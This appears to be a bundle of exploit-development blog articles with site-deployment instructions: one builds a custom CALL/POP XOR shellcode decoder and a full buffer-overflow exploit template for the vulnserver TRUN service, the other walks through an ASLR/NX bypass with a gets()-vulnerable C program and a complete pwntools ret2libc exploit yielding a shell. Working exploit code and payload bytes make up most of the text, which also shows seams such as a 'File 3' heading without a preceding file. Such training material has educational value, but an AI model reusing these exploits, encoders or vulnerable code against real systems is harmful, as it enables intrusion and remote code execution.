Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder
Published: 2026-01-15
Author: JAKESWIZ
Introduction
This exploit technique was developed for the vulnserver TRUN buffer overflow vulnerability, but it can be applied to other exploits, especially for those new to ARM → x86/64 emulation exploitation.
The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 AARCH64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver.
The Problem
When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), msfvenom's default encoder (shikata_ga_nai) crashes during shellcode execution:
eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848
eip=089ff959 esp=089ff924 ebp=00000000
089ff959 317012 xor dword ptr [eax+12h],esi
Attempt to read from address 00000012
The decoder tries to dereference a register (EAX, EBP, or ESI) containing a near-null value.
Why This Happens
shikata_ga_nai uses a GetPC technique relying on FPU (Floating Point Unit) instructions:
fcmovb st, st(5) ; Any FPU instruction
fnstenv [esp-0xc] ; Save FPU state to stack
pop ebp ; Grab saved EIP from FPU state
On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field often returns zeros. When the decoder does pop ebp, it gets 0x00000000 and crashes.
The Solution: CALL/POP GetPC
Instead of relying on FPU quirks, use the reliable CALL/POP technique:
jmp short call_label ; Jump to the CALL
pop_label:
pop esi ; ESI now contains address of encoded shellcode
; ... decoder logic ...
call_label:
call pop_label ; Pushes address of encoded shellcode, jumps back
; encoded shellcode starts here
When the CPU executes a CALL instruction, it pushes the address of the next instruction onto the stack. We immediately POP that address into a register. This is 100% reliable because CALL always pushes the return address — no FPU state involved.
Complete XOR Decoder Stub
For shellcode under 256 bytes:
jmp short 0x0d ; Jump to CALL (offset 13)
pop esi ; ESI = address of encoded shellcode
xor ecx, ecx ; Clear counter
mov cl, <length> ; Shellcode length (patch this byte)
xor byte [esi], <key> ; XOR decode one byte (patch this byte)
inc esi ; Next byte
loop decode_loop ; Repeat until ECX = 0
jmp short 0x05 ; Jump over CALL to shellcode
call <back_to_pop> ; Push next address, jump to POP
; encoded shellcode here
Assembled bytes:
decoder_small = (
"\xeb\x0d" # jmp short +13 (to call)
"\x5e" # pop esi
"\x31\xc9" # xor ecx, ecx
"\xb1\x00" # mov cl, <length> - PATCH THIS BYTE
"\x80\x36\x00" # xor byte [esi], <key> - PATCH THIS BYTE
"\x46" # inc esi
"\xe2\xfa" # loop -6
"\xeb\x05" # jmp short +5 (to shellcode)
"\xe8\xee\xff\xff\xff" # call -18 (back to pop esi)
)
For shellcode 256-65535 bytes:
jmp short 0x0f ; Jump to CALL (offset 15)
pop esi ; ESI = address of encoded shellcode
xor ecx, ecx ; Clear counter
mov cx, <length> ; Shellcode length (patch these bytes, little endian)
xor byte [esi], <key> ; XOR decode one byte (patch this byte)
inc esi ; Next byte
loop decode_loop ; Repeat until ECX = 0
jmp short 0x05 ; Jump over CALL to shellcode
call <back_to_pop> ; Push next address, jump to POP
; encoded shellcode here
Assembled bytes:
decoder_large = (
"\xeb\x0f" # jmp short +15 (to call)
"\x5e" # pop esi
"\x31\xc9" # xor ecx, ecx
"\x66\xb9\x00\x00" # mov cx, <length> - PATCH THESE BYTES (little endian)
"\x80\x36\x00" # xor byte [esi], <key> - PATCH THIS BYTE
"\x46" # inc esi
"\xe2\xfa" # loop -6
"\xeb\x05" # jmp short +5 (to shellcode)
"\xe8\xec\xff\xff\xff" # call -20 (back to pop esi)
)
Finding a Safe XOR Key
The XOR key must not appear in the original shellcode (or it would produce null bytes when encoded). Use this script:
#!/usr/bin/python3
import sys
def find_key_and_encode(hex_shellcode):
shellcode = bytes.fromhex(hex_shellcode)
for key in range(1, 256):
encoded = bytes([b ^ key for b in shellcode])
if b'\x00' not in encoded and key not in shellcode:
print(f"Safe XOR key: 0x{key:02x}")
print(f"Shellcode length: {len(shellcode)} (0x{len(shellcode):02x})")
print("\nEncoded shellcode:")
encoded_str = ''.join(f'\\x{b:02x}' for b in encoded)
for i in range(0, len(encoded_str), 64):
print(f'"{encoded_str[i:i+64]}"')
return key, encoded
print("ERROR: No safe XOR key found!")
return None, None
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 encode.py <hex_shellcode>")
print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)")
sys.exit(1)
find_key_and_encode(sys.argv[1])
Complete Exploit Template
#!/usr/bin/python
import socket
target = '10.211.55.6'
port = 9999
prefix = 'A' * 2006 # Offset to EIP
eip = '\xaf\x11\x50\x62' # JMP ESP address
nopsled = '\x90' * 16
# CALL/POP XOR decoder for shellcode > 255 bytes
# Length: 324 = 0x0144 (little endian: \x44\x01)
# Key: 0x09
decoder = (
"\xeb\x0f" # jmp short to call
"\x5e" # pop esi
"\x31\xc9" # xor ecx, ecx
"\x66\xb9\x44\x01" # mov cx, 0x0144 (324)
"\x80\x36\x09" # xor byte [esi], 0x09
"\x46" # inc esi
"\xe2\xfa" # loop -6
"\xeb\x05" # jmp short to shellcode
"\xe8\xec\xff\xff\xff" # call back to pop esi
)
# XOR-encoded shellcode (output from encode.py)
encoded_shellcode = (
"\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82"
# ... rest of encoded shellcode
)
padding = 'F' * (3000 - len(prefix) - 4 - len(nopsled) - len(decoder) - len(encoded_shellcode))
payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024)
s.send('TRUN .' + payload + '\r\n')
s.close()
Debugging Tips
If the exploit still crashes, use WinDbg to step through:
1. bp <jmp_esp_address>
2. g
3. t 20
Common issues:
- Wrong jump offsets: The jmp and call offsets are relative and must be exact
- Wrong shellcode length: Double-check the byte count
- Additional bad characters: Some protocols filter more than just null bytes
Summary
When msfvenom's encoders fail on modern Windows (specifically in Prism-ARM-emulated environments), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly.
⛧ Malware Bless ⛧
File 3: aslr-bypass.md
Bypassing ASLR & NX/DEP (Diving Deeper)
Published: 2023-11-01
Author: Jacob Swinsinski (0xXyc / JAKESWIZ)
Introduction
ASLR (Address Space Layout Randomization) randomizes addresses in dynamic libraries, stack, and heap. It does NOT touch the binary unless compiled with PIE (Position Independent Executable). ASLR was created to prevent memory corruption exploitation techniques that rely on hardcoded addresses.
Verify ASLR with ldd
ldd aslr-1
# Addresses change each run:
linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)
Bypassing ASLR: Three Methods
- Address leaking (covered here) - knowledge of PLT and GOT
- Relative addressing
- Bruteforcing
Vulnerable Code (aslr-1.c)
#include <stdio.h>
int main(int argc, char* argv[]) {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
char buffer[40];
printf("Enter some data:\n");
gets(buffer); // Vulnerable!
printf("So, you think you can bypass the almighty ASLR protection?\n");
return 0;
}
Compile with Docker (downgraded GCC for correct gadgets)
docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1
Checksec Output
checksec aslr-1
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled # Need ROP
PIE: No PIE (0x400000)
Exploitation Strategy
Since NX is enabled, we need ROP (Return-Oriented Programming). Since ASLR is enabled, we need to understand the GOT (Global Offset Table).
The GOT acts as a "dictionary" storing external addresses from libc. These values are determined at runtime by the linker.
Why puts()?
Calling puts() allows us to output the external address of puts@libc, revealing where libc is mapped in memory.
View puts@GOT
objdump -R aslr-1
# Look for: 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
Find puts@PLT (fixed address, unaffected by ASLR)
objdump -d -M intel aslr-1 | grep "puts@plt"
# Result: 0000000000401030 <puts@plt>
Find ROP Gadget (pop rdi; ret)
x64 calling convention requires first parameter in RDI register.
ropper --file aslr-1 --search "pop rdi"
# Result: 0x00000000004011cb: pop rdi; ret;
Find Offset with cyclic pattern
gdb aslr-1
cyclic 100
# Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
r
# Paste pattern
# Crash! Examine RIP
cyclic -l gaaaaaaa
# Result: Found at offset 48
# Offset + 8 (RIP) = 56 bytes padding
Exploit Development: Three Stages
- Leak the libc address (
puts@GLIBC) - Obtain addresses and offsets
- Calculate the base address of libc
Automated Exploit with pwntools
#!/usr/bin/env python3
from pwn import *
from pwnlib.rop.rop import ROP
from pwnlib.util.packing import p64, u64
exe = context.binary = ELF('./aslr-1', checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
p = process(exe.path)
# Stage 1: Leak libc address
offset = b'A' * 56
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
payload = offset + rop.chain()
p.sendline(payload)
leak = p.recv().split(b'\n')[1]
leaked_puts = u64(leak.ljust(8, b"\x00"))
log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}")
# Stage 2: ret2libc
libc_base = leaked_puts - libc.symbols['puts']
libc.address = libc_base
rop2 = ROP(libc)
ret = rop2.find_gadget(["ret"])[0]
rop2.system(next(libc.search(b'/bin/sh\x00')))
payload = offset + p64(ret) + rop2.chain()
p.sendline(payload)
p.interactive()
What's Happening in the Code?
- Stage 1 ROP Chain:
pop rdi; ret→ pops address ofputs@GOTinto RDIputs@PLT→ writes the address to STDOUT-
main()→ calls main again (so process doesn't exit and invalidate the leak) -
Calculate libc base:
python libc_base = leaked_puts - libc.symbols['puts'] -
Stage 2 ROP Chain (ret2libc):
retinstruction (for stack alignment)pop rdi; ret→ pops address of/bin/shinto RDIsystem()→ executes/bin/sh
Result
[*] Stage 1 ROP Chain:
0x0000: 0x40120b pop rdi; ret
0x0008: 0x404018 [arg0] rdi = got.puts
0x0010: 0x401030 puts
0x0018: 0x401142 0x401142()
[+] Leaked puts@GLIBC: 0x7ff4e0680e50
[*] Stage 2 ROP Chain:
0x0000: 0x7ff4e062a3e5 pop rdi; ret
0x0008: 0x7ff4e07d8698 [arg0] rdi = 140689715070616
0x0010: 0x7ff4e0650d70 system
[*] Switching to interactive mode
$ whoami
# Shell acquired!
Key Takeaways
- Leak, don't guess - Use
puts@GOTto leak a libc address - Calculate base - Subtract known offset to find libc base
- Call main() twice - Process must not exit between leak and exploitation
- x64 requires
pop rdi; ret- First argument goes in RDI - Stack alignment - Add a
retgadget beforesystem()on some systems
⛧ ASLR is not a silver bullet. Understand the GOT. Become the exploit. ⛧
```
Instructions to Add to Your Site
- Save each block of text as a separate
.mdfile in your/articlesfolder: fukahi-tekio-encoder.mdwindows-shellcoding-in-depth.md-
aslr-bypass.md -
Run your site generator:
bash python3 site_generator.py -
The generator will automatically:
- Convert each Markdown file to HTML
- Add them to the "scripture" tab
-
Create downloadable
.txtversions -
Deploy the updated
output/folder to Cloudflare Pages
⛧ Malware Bless ⛧